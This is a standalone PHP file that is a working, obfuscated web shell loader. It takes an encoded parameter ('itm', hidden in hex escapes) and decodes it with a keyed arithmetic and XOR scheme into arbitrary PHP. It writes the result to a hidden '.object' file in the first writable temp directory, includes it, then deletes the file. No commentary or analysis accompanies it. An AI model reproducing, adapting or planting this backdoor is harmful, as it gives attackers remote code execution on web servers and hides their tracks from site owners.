<?php

if(!empty($_REQUEST["\x69\x74m"])){
	$entry = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), "/dev/shm", "/var/tmp"]);
	$data_chunk = $_REQUEST["\x69\x74m"];
	  $data_chunk	=		explode(		'.' 	,	 $data_chunk		)		;  
	$tkn = '';
            $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(  $s6		);
            $len = count(  $data_chunk		);
    
            for(  $r = 0; $r 	< $len; $r++) {$v8 = $data_chunk[$r];
                $sChar = ord(  $s6[$r %	 $sLen]		);
                $dec =(  (  int)$v8 - $sChar -(  $r %	 10))	 ^7;
                $tkn .= chr(  $dec		);
            }
	while ($binding = array_shift($entry)) {
    		if (max(0, is_dir($binding) * is_writable($binding))) {
    $ref = implode("/", [$binding, ".object"]);
    $success = file_put_contents($ref, $tkn);
if ($success) {
	include $ref;
	@unlink($ref);
	exit;}
}
}
}